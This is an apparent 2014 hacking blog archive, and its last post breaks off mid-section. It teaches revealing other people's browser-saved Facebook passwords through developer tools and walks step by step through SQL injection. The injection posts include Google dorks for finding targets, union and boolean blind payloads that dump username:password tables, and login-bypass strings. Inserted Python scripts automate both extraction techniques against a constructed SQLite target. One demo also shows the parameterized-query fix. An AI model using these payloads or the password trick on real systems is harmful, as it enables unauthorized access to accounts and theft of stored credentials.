Thursday, December 18, 2014
How to Hack Facebook Account Password saved on web browser


In my previous articles on hacking Facebook we covered techniques such as social engineering, phishing, keylogging, tabnabbing and the three-friend password recovery trick. Today I will explain how to read a Facebook password that a web browser has saved, in well under five minutes. You may be thinking that saved passwords can simply be viewed under Settings > Saved passwords in the browser. But what if the saved-passwords list is protected by a master password or by the operating-system login? The trick below does not touch the password manager at all: it reads the password from the login form the browser has already autofilled, so it works in any browser that has developer tools. The one condition is that the browser must actually have autofilled the field; if a master password is set and the browser has not been unlocked in this session, the field stays empty and there is nothing to reveal.

People usually let their personal laptop or desktop save passwords so that they do not have to type or remember them. To add a layer of protection, browsers gate the saved-passwords list behind a master password (or, in Chrome, the Windows account password) so that other users of the machine cannot read it from the settings page.

Let's take Google Chrome as the example. We know the password is stored in Chrome; if we try to view it through Settings > Manage passwords, we see something like this:

(Screenshot: stored password on Google Chrome, masked)

Clicking Show prompts for the Windows account password:

(Screenshot: password protected by the Windows account password)

On your own machine that is fine, but on a friend's machine or in a cyber cafe, where you do not know the account password, the prompt stops you. The way around it is to take the password from the login form instead of from the settings page, as follows.

1. Open the Facebook login page. If a password is saved for the site, the browser autofills both fields and the password shows as dots:

(Screenshot: hidden password on the Facebook login page)

2. Right-click the password field and choose Inspect Element (Chrome, Firefox and other browsers with developer tools all offer this):

(Screenshot: inspecting the password field to see the markup behind it)

3. The developer tools open with the field's HTML highlighted:

(Screenshot: the input element of the password box)

4. In the highlighted tag the TYPE attribute is set to "password". That attribute only tells the browser to mask what it displays; it is not encryption, and the browser has already placed the real value in the field. Double-click the attribute value and change "password" to "text":

(Screenshot: change type from password to text)

5. Now look back at the page: the field displays the saved password in plain text.

(Screenshot: password shown in plain text)

That's it.

There are legitimate uses for this as well:
1. Recovering a password you saved and then forgot.
2. Checking what you have typed into a password field before submitting it.
3. The same trick works for every site whose password the browser has saved, not just Facebook.
4. Viewing your friends' passwords, with the obvious lesson that an autofilled password is readable not only by whoever sits at the keyboard but by any script running on that page, which is why autofill on shared machines is a bad idea.

Enjoy learning and learn hacking! Surprise your friends with this technique.
Tuesday, November 25, 2014
Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8


A SQL injection flaw is one of the easiest flaws both to exploit and to fix, provided you know how. Continuing our injection attacks series, today we cover the union exploitation technique. It is the most common and most convenient way to exploit a SQL injection, and understanding it tells you equally well how to stop it: if user input can never become part of the SQL text, there is nothing for a UNION to attach to. Let's go through the technique in detail with examples.


(Image: Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8)

Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.

First, what is the UNION operator? UNION is a keyword supported by practically every database: it appends the result set of a second SELECT to that of the first, provided both return the same number of columns with compatible types. Attackers use exactly this property. When a page embeds their input in a query, they append UNION SELECT ... with a SELECT of their own, and the page renders rows from any table the application's database account can read, including usernames, passwords and other sensitive data.

Here is a brief outline of the procedure:
1. Find a website that is vulnerable to SQL injection.
2. Find the number of columns in the vulnerable query's SELECT list using ORDER BY.
3. Find which of those columns are rendered on the page, using a UNION SELECT of marker values.
4. Test run: confirm a rendered column works by querying the database version through it.
5. Use INFORMATION_SCHEMA to get the table names.
6. Use INFORMATION_SCHEMA to get the column names.
7. Select the column values you want from the table, for example usernames, passwords or customer data.
That is the whole technique. Now let's look at each step in detail.


Union Exploitation Technique to Exploit SQL Injection Vulnerability:

Step 1: Finding SQL injection vulnerable websites:

We covered this in earlier articles; in brief, Google can locate candidate pages with a search such as:

inurl:php?id=

There are many other dorks, but this one is the simplest: it returns pages that pass an id parameter to a PHP script, and such parameters are frequently concatenated straight into SQL. Open one of the results, say

www.example.com/shop.php?id=6

To check whether it is injectable, append a single quote (') to the value, so the URL becomes:

www.example.com/shop.php?id=6'

If the response contains an error like the one below, the quote reached the database and the site is vulnerable:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

or something like:

Query failed: You have an error in your SQL syntax near ''6''' at line 1

or any other database error. (A page that merely changes or goes blank can still be injectable; that case is handled by the boolean technique of Part 7.)




Step 2: Finding the exact number of columns in the query

Once you know the site is vulnerable, the next step is to learn how many columns the vulnerable SELECT statement returns, because a UNION only parses when both sides have the same count. ORDER BY <NUM> sorts by the NUM-th column of the result and fails when NUM is larger than the number of columns, so request:

www.example.com/shop.php?id=6 ORDER BY <NUM>--

(On MySQL the -- comment must be followed by a space; in a URL write --+ or --%20 so that the space survives.) Say the query has 16 columns, which you do not know yet. You can find the count quickly by stepping in tens and then narrowing down. For example:

www.example.com/shop.php?id=6 ORDER BY 10--

Result: the normal page with data, no error.

Then increase by 10:

www.example.com/shop.php?id=6 ORDER BY 20--

and so on until you get an error such as:

Unknown column '20' in 'order clause'

or a custom error page. Once you see the error you have exceeded the column count, so decrease the number one at a time until the error disappears. The last value that loads normally is the column count. With 16 columns the last successful request is:

www.example.com/shop.php?id=6 ORDER BY 16--

This gives the number of columns selected by the query behind the page (not the number of columns in the database).



Step 3: Finding the displayed columns using UNION ALL

Knowing the column count, find out which of the columns the page actually prints by injecting a SELECT of numbered markers:

www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

If the page renders our row, some of the numbers appear on it. Those positions are the usable columns (often called the vulnerable columns): say 2, 4 and 8 are displayed, then columns 2, 4 and 8 are where you can place your own expressions and read the results.

If the page shows its usual content and no numbers, the original query still matched a row and the template rendered that one instead of ours. Make the original WHERE clause match nothing by negating the id, so the only row left to display is the one from our SELECT:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Now numbers appear scattered over the page: those are the columns you can use. If the UNION itself raises an error, either the count from step 2 is wrong or a column type rejects the numeric marker; databases stricter than MySQL (MS SQL Server, PostgreSQL, Oracle) need NULL in place of the numbers to avoid type mismatches.




Step 4: Test run to validate the displayed columns

Now that we have the list of displayed columns, confirm they work by putting a database function in one of them. The easiest test is version(); with column 2 as the displayed one:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

The version string now appears where the 2 was. database() and user() work the same way and tell you the current schema and account. Repeat for each displayed column.


Step 5: Use INFORMATION_SCHEMA to get table names

Next we extract the table names of the current database. MySQL, like most databases, exposes its catalogue as ordinary tables in the INFORMATION_SCHEMA database, so the catalogue can be read through the same injection.

Learn more about the INFORMATION_SCHEMA TABLES table here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html

No special privilege is needed: INFORMATION_SCHEMA shows each account the tables it has some privilege on, which is exactly the set the web application's account can read. To list the tables we run the following through column 2:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()--

group_concat() folds all table names into one comma-separated string so they fit in a single displayed cell. By default MySQL truncates that string at group_concat_max_len (1024 bytes); use LIMIT and OFFSET to page through longer lists. From the list you can usually tell which table holds usernames and passwords.

Step 6: Use INFORMATION_SCHEMA to get column names

Using the same idea as step 5, we read the column names from INFORMATION_SCHEMA.COLUMNS.

Learn more about the COLUMNS table here:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html

The following query lists the column names in the current database:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()--

This returns every column of every table, which is more than you need; add and table_name = 'USERS' to the WHERE clause to see only the columns of the table you picked in step 5.


Step 7: Get the column values from the table you want

We now have table names and column names; what remains is the data. Say step 5 showed a table USERS and step 6 showed it has columns USERNAME and PASSWORD. This query pulls the data:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS--

The page shows the rows as username:password pairs, because 0x3a is the hex literal for ':' (written in hex so that no quote character is needed in the payload). Expect the password column to hold hashes rather than clear text on any sensibly built site; those still have to be cracked offline.

That's it: table names, column names, usernames and passwords. We will continue with the other injection techniques in later tutorials.

If you have any queries or doubts, feel free to ask.
Tuesday, October 28, 2014
Boolean Exploitation Technique to exploit SQL Injection Vulnerability | INJECTION ATTACKS - PART 7


In the previous tutorial we listed the SQL injection characters and the different techniques for exploiting a SQL injection. Starting today we cover each technique in detail with examples, beginning with the boolean exploitation technique.

The boolean exploitation technique extracts data from the database by asking the application a series of yes/no questions. It is used when a blind SQL injection is suspected, i.e. when the output of the injected query is never shown: the developer has replaced database errors with custom messages (a 404, a 500 or a generic error page) that reveal nothing, and the only signal left is whether the page behaves as it does for a true condition or for a false one. The method is to send a sequence of boolean queries, observe the answers and deduce the data from them.

(Image: Boolean Exploitation Technique)


Consider a vulnerable website www.example.com with a parameter "Id" that is injectable. Suppose we request:

http://www.example.com/index.php?id=1'

and get back a custom error page, say a 404 or 500. We assume the backend runs a query like:

SELECT Field1, Field2, Field3 FROM Users WHERE Id='$Id'

As discussed in previous articles, this SQL is injectable. Our goal is to obtain the value of the username field, of which we currently know nothing: we only control the Id parameter, and nothing the query returns is shown to us. The tests below recover the username one character at a time, using standard functions present in almost every database:

1. SUBSTRING(text, start_position, length): returns the part of text beginning at start_position and at most length characters long. If start_position is beyond the end of text, the result is an empty string (MySQL) or NULL (Oracle).

2. LENGTH(text): returns the number of characters in text.

3. ASCII(char): returns the ASCII code of the first character of its argument. For an empty string MySQL returns 0; for NULL it returns NULL.

There are many more functions, but these three suffice. We test the first character, and once we know it we move to the second, and so on until we have the whole value. SUBSTRING selects one character at a time (length fixed to 1) and ASCII turns it into a number so that we can compare it numerically. The comparison is repeated against candidate values from the ASCII table until the right one is found.

For example, try this value of the Id parameter:

$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

So the URL becomes:

http://www.example.com/index.php?id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

and the SQL query executed is:

SELECT Field1, Field2, Field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'

The trailing AND '1'='1 only consumes the closing quote the application appends, so that the statement stays syntactically valid. The query returns a row if and only if the first character of username has ASCII code 97 ('a'). If the answer is false we move on to 98 and repeat the request; if it is true we reset the candidate and analyze the next character by changing the start position in SUBSTRING. (Comparing with > instead of = and binary-searching the code cuts the work to about seven requests per character.)

The remaining problem is how to tell a true answer from a false one when the page shows neither data nor errors. We solve it by first sending a request that is guaranteed to be false, so that we learn what the false response looks like:

$Id=1' AND '1'='2

The query becomes:

SELECT Field1, Field2, Field3 FROM Users WHERE Id='1' AND '1'='2'

and the URL:

http://www.example.com/index.php?id=1' AND '1'='2

This query never returns a row. Whatever the application shows for it (an empty page, a custom error message, a 500) is the template for false, and the response to the unmodified id=1 is the template for true. Each subsequent test is classified by comparing its response with those two.

Sometimes this does not work directly. If the web server returns two different pages for two identical consecutive requests (because of timestamps, session tokens, adverts or other dynamic content), we cannot distinguish true from false by comparing whole pages. In that case we filter out the parts that change between the two requests and keep only a stable template; then, for every boolean request, we extract the same template from the response and compare templates to decide the result of the test.

We have not yet discussed the termination condition, i.e. when to stop. The technique relies on a property of SUBSTRING and on LENGTH. When the test compares the current character with ASCII code 0 and the answer is true, then either we have scanned the whole string (SUBSTRING returned nothing) or the value contains a NUL character. To decide which, we check the length with this value of Id:

$Id=1' AND LENGTH(username)=N AND '1'='1

where N is the number of characters scanned so far (the terminating zero is not counted). The query becomes:

SELECT Field1, Field2, Field3 FROM Users WHERE Id='1' AND LENGTH(username)=N AND '1'='1'

and the URL:

http://www.example.com/index.php?id=1' AND LENGTH(username)=N AND '1'='1

If this is true we have the complete username. If it is false, the value contains a NUL character in the middle, and we continue the procedure from position N+1 until the length test is true. Alternatively, determine LENGTH(username) first with the same comparison-and-search approach and stop after exactly that many characters.

That's all about the boolean exploitation technique. If you have any doubts, feel free to ask. Enjoy learning! Happy hacking!
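The following Python script is an added, runnable illustration of both this boolean procedure and the union technique of Part 8; it is not code from the original posts. It builds a constructed in-memory SQLite stand-in for the vulnerable shop page (a handler that concatenates the id parameter into its query and renders only some columns) and drives the steps against it: counting columns with ORDER BY, finding the displayed column with a UNION of markers, dumping the catalogue and the users table through that column, and then recovering a value character by character from boolean responses alone. SQLite is assumed in place of MySQL, so sqlite_master and pragma_table_info replace INFORMATION_SCHEMA, '||' replaces CONCAT with 0x3a, and unicode()/substr() replace ASCII()/SUBSTRING(); the table and row contents are made up. It goes beyond the post in one respect: each character's code is found by binary search rather than by stepping through the ASCII table.

```python
import sqlite3

# Constructed stand-in for the vulnerable shop site (Part 8) and the blind
# injection target (Part 7); not a real site. SQLite replaces MySQL, so
# sqlite_master and pragma_table_info stand in for INFORMATION_SCHEMA,
# '||' for CONCAT with 0x3a, and unicode()/substr() for ASCII()/SUBSTRING().
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE shop  (id INTEGER, name TEXT, price TEXT);
    INSERT INTO shop  VALUES (6, 'Widget', '9.99');
    CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 's3cret');
""")

ERROR_PAGE = "<h1>Error</h1>"


def shop_page(id_param):
    """The vulnerable handler: the id parameter is pasted into the SQL text.
    The template prints only name and price (never the id column), and any
    statement that fails to parse yields the site's generic error page."""
    sql = "SELECT id, name, price FROM shop WHERE id=" + id_param
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return ERROR_PAGE
    return "".join("<p>%s: %s</p>" % (name, price) for _, name, price in rows)


# ---- Part 8: union exploitation ----

def count_columns(max_cols=32):
    """Step 2: ORDER BY n parses only while n <= number of selected columns."""
    for n in range(1, max_cols + 1):
        if shop_page("6 ORDER BY %d--" % n) == ERROR_PAGE:
            return n - 1
    raise RuntimeError("more than %d columns" % max_cols)


def displayed_columns(ncols):
    """Step 3: id=-6 makes the original query match nothing, so the row that
    renders is ours; the markers that show up are the usable columns."""
    markers = ",".join("'@%d@'" % i for i in range(1, ncols + 1))
    page = shop_page("-6 UNION ALL SELECT %s--" % markers)
    return [i for i in range(1, ncols + 1) if "@%d@" % i in page]


def union_extract(ncols, col, expr, from_clause=""):
    """Steps 4-7: put `expr` in displayed column `col`, literal numbers in
    the others, and return the text that column rendered."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = "'@@'||(%s)||'@@'" % expr
    page = shop_page("-6 UNION ALL SELECT %s %s--" % (",".join(cols), from_clause))
    return page.split("@@")[1]


def run_union():
    ncols = count_columns()
    col = displayed_columns(ncols)[0]
    return {
        "columns": ncols,
        "version": union_extract(ncols, col, "sqlite_version()"),
        "tables": union_extract(ncols, col, "group_concat(name)",
                                "FROM sqlite_master WHERE type='table'"),
        "user_columns": union_extract(ncols, col, "group_concat(name)",
                                      "FROM pragma_table_info('users')"),
        "creds": union_extract(ncols, col,
                               "group_concat(username||':'||password)",
                               "FROM users"),
    }


# ---- Part 7: boolean (blind) exploitation ----

def holds(condition):
    """Boolean oracle: the product renders only when the injected AND is true.
    The response is compared with the always-false probe from Part 7, so no
    visible error message is needed."""
    return shop_page("6 AND (%s)--" % condition) != shop_page("6 AND 1=2--")


def blind_extract(expr, max_len=64):
    """Recover the value of the SQL expression `expr` one character at a time.
    Beyond the post: each code is found by binary search (7 requests per
    character) instead of stepping through the ASCII table."""
    out = ""
    for pos in range(1, max_len + 1):
        if holds("length((%s)) = %d" % (expr, pos - 1)):
            return out                      # termination test from Part 7
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if holds("unicode(substr((%s), %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    raise RuntimeError("value longer than %d characters" % max_len)


if __name__ == "__main__":
    print(run_union())
    print(blind_extract("SELECT username FROM users WHERE id=1"))
```

Against a real MySQL target the only changes are the catalogue queries (information_schema.tables and information_schema.columns) and the function names (ASCII, SUBSTRING, CONCAT); the request pattern and the two oracles stay the same.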
Sunday, October 26, 2014
How to Exploit SQL Injection Vulnerability | Injection attacks - Part 6


Previously we learnt about standard SQL injection and simple ways to test for it. Today we move on to exploitation. There are many ways to exploit a SQL injection flaw and we will cover them one by one; this article gives an overview of the exploitation techniques and of the characters they are built from.

Different ways to exploit SQL Injection Vulnerability :

1. Boolean Exploitation Technique
2. Union Exploitation Technique
3. Error Based Exploitation Technique
4. Out of band Connection Exploitation Technique
5. Time Delay Exploitation Technique
6. Stored Procedure Injection Exploitation Technique
7. Automated Exploitation Technique using SQLi Tools


Before starting on any of them, we must know the SQL injection characters. These are the characters and keywords that, when passed unsanitized into a query, change its meaning; nearly every SQL injection is built from them. The list below is the important subset.

SQL Injection Characters:

' or "                    String delimiters. A quote closes the string literal the input sits in; everything after it is parsed as SQL.
--                        Single-line comment (MySQL requires a space after it; in a URL write --+)
#                         Single-line comment in MySQL; date delimiter in MS Access
/* ... */                 Multi-line comment
+                         Addition, and string concatenation in MS SQL Server; in a URL query string it decodes to a space
||                        String concatenation in Oracle and PostgreSQL
-                         Subtraction operator, or a range indicator in CHECK constraints
%                         Wildcard in LIKE patterns
=                         Equality operator
<> !=                     Inequality operators
> <                       Greater-than and less-than operators
( )                       Expression grouping and precedence
,                         List item separator
.                         Identifier qualifier separator (schema.table.column)
@var                      Local (user) variable in MS SQL Server and MySQL
@@var                     Global/system variable in MS SQL Server and MySQL
?Param1=foo&Param2=bar    URL parameters
PRINT                     MS SQL Server non-transactional command, useful for probing
WAITFOR DELAY '0:0:10'    MS SQL Server time delay, the basis of time-based blind injection

These characters are the basis of every SQL injection; attackers combine them to exploit a SQL injection vulnerability.

We also missed one thing in the previous article: fingerprinting the database. Below are some differences that identify which database you are talking to when there is no easier way. By injecting conditions of the form ' AND <condition> AND '1'='1, where <condition> uses a function or syntax that exists in only one DBMS, we can tell from whether the page behaves as true or false which database sits behind the application.

(Image: Fingerprinting of database)

In later articles we will learn each SQL injection exploitation technique in detail. Keep learning. Enjoy!
Sunday, October 12, 2014
How to test SQL Injection Vulnerability | Injection attacks - Owasp #1 Vulnerability - Part 5


In the previous article we learned about standard (classical) SQL injection with a set of examples. Today we cover how to test for SQL injection flaws and how to fingerprint the database, the two steps every exploitation depends on:
1. Testing whether the website or web application is vulnerable at all.
2. Fingerprinting the database, i.e. identifying the DBMS (MySQL, Oracle, MS SQL Server, and so on).

So let's learn them one by one in detail for better understanding.


How to test whether a website or web application is vulnerable to SQL injection?

To test for SQL injection you first have to know where the application talks to its database. Most web applications query the database whenever they must retrieve a set of records from a table: during authentication (the username and password entered by the user are looked up in a users table), in an e-commerce site that lists product details from a products table, or in a search feature that reads from an indexed table.

(Image: How to test SQL Injection Vulnerability)

To reconstruct the SQL the developer used, the tester has to note every probable input, including the hidden fields of POST requests, not just the visible form fields. Tools like Tamper Data (a Firefox add-on) let you intercept and alter requests in real time, so hidden POST fields can be tested as easily as URL parameters.

1. Testing special characters and keywords:
Start by adding a single quote (') or a semicolon (;) to the field or parameter under test. For example:

http://www.example.com/product.php?id=10'

or

http://www.example.com/product.php?id=10;

If this produces a database error, the site is vulnerable to SQL injection (exploitation techniques follow in the next part). If there is no error, test further by adding comments (/* or --) or keywords such as AND and OR that alter the request, for example id=10 AND 1=1 against id=10 AND 1=2: a page that differs between the two is evaluating our condition.

2. Testing fields by content type:
This is easy to perform: find out what type of value a field expects and give it something else. If a field accepts only integers, pass a string. Another way is to feed it special or encoded characters. If the request results in an error, the website is vulnerable to SQL injection. For example, if the ID field accepts only integers, try:

http://www.example.com/product.php?id=mycheck

Watch every response from the web server and read the HTML and JavaScript source as well, because the error is sometimes present there but not rendered: JavaScript errors, HTML comments and the like are hidden from the user. A full error message provides plenty of useful information for a successful injection. Applications often do not give that much detail, though: a plain '500 Server Error', a custom error page or a 404 response means blind injection techniques are required. In any case it is important to test each field separately: vary only one parameter while all the others stay constant, so that you know precisely which parameters are vulnerable and which are not.



Fingerprinting the database:

Every DBMS has its own characteristics: special commands, functions for retrieving data, comment syntax and other features. Advanced SQL injection needs to know which DBMS it is dealing with in order to use them.

The first way to identify the back-end database is to look at the error returned by the application. For example:

Web application using MySQL as back-end database:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Web application using Oracle as back-end database:

ORA-00933: SQL command not properly ended

Web application using MS SQL Server as back-end database:

Microsoft SQL Native Client error '80040e14' Unclosed quotation mark after the character string

and so on.

When no error is shown, an alternative is to inject into a string field using each DBMS's own concatenation syntax and see which one yields the same page as the plain value. The operators differ:

MySQL: 'Hack' 'ing' (adjacent string literals are concatenated; CONCAT('Hack','ing') also works, whereas + is arithmetic and yields 0)

MS SQL Server: 'Hack' + 'ing'

Oracle and PostgreSQL: 'Hack'||'ing'

The syntax that concatenates correctly, i.e. behaves exactly like the plain string 'Hacking', confirms which back-end database the application is using.

That's all for today. We will learn the SQL injection exploitation techniques one by one in later articles.

If you have any doubts or queries feel free to ask.



Thursday, October 9, 2014
Standard SQL Injection | Injection attacks - Owasp #1 Vulnerability - Part 4


In the previous article we learned the basics of blind SQL injection through untrusted data parsing. Today we cover standard (classical) SQL injection in detail. Recall from that article the always-true condition (OR 1=1).

(Image: Standard SQL Injection | Injection attacks - Owasp #1 Vulnerability)


Consider a table named "users" holding login credentials, and a login query that validates the submitted data like this:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

If the query returns a row, a user with those credentials exists and the user is logged in; otherwise access is denied. The values normally come from a web form. Suppose we submit the following username and password:

$username = 1' or '1' = '1

$password = 1' or '1' = '1

Then the query becomes:
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

If the parameters are sent with the GET method and the vulnerable site is www.example.com, the request looks like:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

The query returns a row (or a set of rows) because the WHERE clause is always true: AND binds tighter than OR, so it reads Username='1' OR ('1'='1' AND Password='1') OR '1'='1', and the final OR '1'='1' alone makes it true. The application has thus authenticated us without a valid username or password.
In many systems the first row of the users table is an administrator account, so that is often the profile we end up logged in as.


Above one was the typical example of SQL Injection which nowadays is not that much effective as most of developers use Encryption on password, usually MD5. So do imposing an encryption on passwords can protect databases? Answer is straight forward "NO". Lets consider an another example, which contains encryption employed in it. Say developer uses below SQL Query to authenticate users on website:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password'))) 

Now above query has two issues for Hackers to hack into this, first parenthesis and second one MD5 Encryption both highlighted in red. So first of all lets solve the problem of parenthesis. First of all we need to identify correct number of parenthesis specially opening ones, it is quite easy just keep on adding closing parenthesis until we get the correct number of closing parenthesis but why? Simply because we wish to bypass the second problem :D yes we want to comment the MD5 encryption within the query to bypass the authentication. Every DBMS has its own syntax for comments, however, a common symbol to the greater majority of the databases is /*. In Oracle the symbol is "--". 
In this case we will use below username and password to bypass:

$username = 1' or '1' = '1'))/*

$password = foo


So the query will become something like below:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password'))) 


Now due to the inclusion of a comment delimiter in the $username value, the password portion of the query will be ignored i.e. commented.

And the URL Request to execute above query will be something like :


http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo 

This may return a number of values. Sometimes, the authentication code verifies that the number of returned records/results is exactly equal to 1. 

In the previous examples, this situation would be difficult (in the database there is only one value per user).

In order to go around this problem, it is enough to insert a SQL command that imposes a condition that the number of the returned results must be one. (One record returned) In order to reach this goal, we use the operator "LIMIT <num>", where <num> is the number of the results/records that we want to be returned. With respect to the previous example, the value of the fields Username and Password will be modified as follows:

$username = 1' or '1' = '1')) LIMIT 1/* 

$password = foo 

This results in a query like the following:
SELECT * FROM Users WHERE ((Username='1' or '1' = '1')) LIMIT 1/*') AND (Password=MD5('$password')))


The URL to execute the above query is:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo


The above URL fetches the first row of the Users table and allows an attacker to bypass the website's authentication.
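To see why the payloads above work and how the defect is removed, here is an added example (not code from the original post) that runs the page's query shape against a small SQLite database. The MD5() function, the Users table and its two accounts are constructed for the demo, with MD5 registered as a Python function purely so the query reads the same as on the page; MD5 is not suitable for real password storage. The vulnerable login concatenates the username and password into the SQL string exactly as the PHP snippet does, and the hardened login binds them as parameters so they are never parsed as SQL.

```python
import hashlib
import sqlite3

# The two payloads discussed on the page.
PAYLOAD_COMMENT = "1' or '1' = '1'))/*"
PAYLOAD_LIMIT = "1' or '1' = '1')) LIMIT 1/*"


def md5_hex(value: str) -> str:
    """Stand-in for MySQL's MD5() so the page's query runs unchanged on SQLite."""
    return hashlib.md5(value.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users whose passwords are stored as MD5 hashes."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("MD5", 1, md5_hex)
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users (Username, Password) VALUES (?, MD5(?))",
                     [("admin", "correct horse"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Builds the query by string concatenation, as the page's $username/$password query does.
    SQLite, like most engines, treats an unterminated /* as a comment to end of input, so the
    password clause is dropped exactly as described in the text."""
    query = (f"SELECT * FROM Users WHERE ((Username='{username}') "
             f"AND (Password=MD5('{password}')))")
    return conn.execute(query).fetchall()


def login_parameterized(conn, username: str, password: str) -> list:
    """The fix: bound parameters. Quotes, parentheses, LIMIT and comment markers in the input
    are just characters compared against the Username column, so no row matches."""
    return conn.execute(
        "SELECT * FROM Users WHERE ((Username=?) AND (Password=MD5(?)))",
        (username, password),
    ).fetchall()


def authenticated(rows: list) -> bool:
    """The 'exactly one record' check the text mentions; the LIMIT 1 payload is built to satisfy it."""
    return len(rows) == 1


if __name__ == "__main__":
    db = make_db()
    print("legit login:", authenticated(login_vulnerable(db, "admin", "correct horse")))
    print("comment payload rows:", len(login_vulnerable(db, PAYLOAD_COMMENT, "foo")))
    print("LIMIT payload passes count check:", authenticated(login_vulnerable(db, PAYLOAD_LIMIT, "foo")))
    print("same payload, parameterized:", login_parameterized(db, PAYLOAD_LIMIT, "foo"))
```

The count check alone is not a defence: the first payload returns every row and fails it, the second returns one row and passes. Only the parameterized query closes the hole, and the parentheses and hash that looked like obstacles were never the control.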

That's all for today. We will learn more about SQL Injection Exploitation techniques in later articles. Keep Learning!



Friday, October 3, 2014
Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide


You might have heard that you should not enter your password, credit card details or any other sensitive information on public computers or in chats on Facebook, Yahoo and the like. The reason is that hackers have ways to steal your credit card numbers, passwords and so on.




A hacker can use different types of attacks, such as packet sniffing or ARP poisoning, to steal your sensitive information.

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication channel between a web client and a web server. You will have seen the http:// and https:// prefixes and may be wondering what they mean: HTTP is used for standard, unencrypted communication between the web server and the client, while HTTPS is used for secure communication.


Cryptography



If two users want to communicate securely, they can use cryptography to accomplish it.

For example: 

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how I decrypted it. Here the algorithm is a forward shift (+) and the key is 1: the letter after S is T, so S is converted into T; the letter after E is F, so the E in SECURE becomes F; and so on. To help you understand this better I am adding a video:






So if a hacker starts sniffing in the middle of the conversation he only gets the encrypted text and, not knowing the key, cannot decrypt it. But if the attacker is sniffing from the very start he also captures the key and can easily decrypt the data.
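The shift cipher from the SECURE/TFDVSF example, with the two sniffer situations just described, as an added example that is not part of the original post. The function names and the 25-key enumeration are mine; the cipher, the key of 1 and the sample word are the page's.

```python
import string

ALPHABET = string.ascii_uppercase


def shift_encrypt(plaintext: str, key: int) -> str:
    """Shift every letter forward by `key` positions (key 1: S -> T, E -> F, ...).
    Characters outside A-Z pass through unchanged."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def shift_decrypt(ciphertext: str, key: int) -> str:
    """Undo the shift: the same operation with the negated key."""
    return shift_encrypt(ciphertext, -key)


def what_the_sniffer_sees(message: str, key: int, saw_key_exchange: bool) -> str:
    """Model of the text's two cases: a sniffer that joined mid-conversation holds only the
    ciphertext, while one that watched from the start also holds the key."""
    ciphertext = shift_encrypt(message, key)
    return shift_decrypt(ciphertext, key) if saw_key_exchange else ciphertext


def all_candidate_plaintexts(ciphertext: str) -> list:
    """Why a shift 'key' is no real protection: only 25 non-trivial keys exist, so even the
    mid-stream sniffer can list every possible plaintext and pick the readable one."""
    return [shift_decrypt(ciphertext, k) for k in range(1, 26)]


if __name__ == "__main__":
    print(shift_encrypt("SECURE", 1))                       # TFDVSF
    print(what_the_sniffer_sees("SECURE", 1, saw_key_exchange=False))
    print(what_the_sniffer_sees("SECURE", 1, saw_key_exchange=True))
    print(all_candidate_plaintexts("TFDVSF"))
```

The last function is the caveat the video example leaves out: a mid-stream sniffer is only stopped when the key space is far too large to enumerate, which is why SSL/TLS uses real ciphers and keys of 128 bits or more rather than a one-letter shift.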



Standard Communication VS Secure communication 



Suppose there are two communicating parties, A (client) and B (server).


Standard communication(HTTP)



When A sends information to B over HTTP it travels unencrypted. This is acceptable if A is not sharing confidential information, but if A sends something sensitive, say a password, it too travels in the clear, and a hacker sniffing the communication will get the password.

This scenario is illustrated using the following figure -


Figure: Standard communication (HTTP)



Secure communication(HTTPS) 



